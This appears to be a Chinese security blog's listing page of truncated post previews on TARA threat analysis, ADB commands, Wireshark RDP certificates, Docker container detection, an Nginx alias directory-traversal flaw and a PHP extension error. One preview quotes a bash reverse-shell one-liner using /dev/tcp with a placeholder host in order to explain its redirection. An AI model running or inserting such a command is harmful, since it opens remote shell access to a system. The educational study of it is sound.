什么是TARA分析?

TARA分析是Threat Analysis and Risk Assessment(威胁分析与风险评估)的缩写,它是一种在汽车电子电气架构中常用的网络安全威胁分析与风险评估方法论。TAR...
1

ADB调试常用指令

常用的ADB调试指令: 启动和停止ADB服务 adb start-server:启动ADB服务。 adb kill-server:停止ADB服务。 设备连接管理 adb devices:列出...

对反弹shell中0>&1的理解

今天在学习反弹shell,遇到一个经典的构造: /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解,为什...
2

Wireshark分析RDP服务器专有证书

本文记录一次使用Wireshark分析RDP证书的过程,这次遇到的证书比较特殊,是服务器专有证书(Server Proprietary Certificate),不能直接使用X.509格式的方...

Docker容器识别

想研究的课题是容器的渗透,一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器,通过何...

Nginx目录穿越漏洞

漏洞介绍 Nginx在配置alias的时候,如果location最后不是以斜杠结尾,而alias以斜杠结尾,那么将出现目录穿越漏洞。 通过实验了解漏洞 实验靶场用...

宝塔PHP安装扩展memcached失败

使用宝塔自带的php扩展安装功能,安装memcached失败,截取报错信息最后一段: checking whether to enable memcached msgpack serializer support... no ...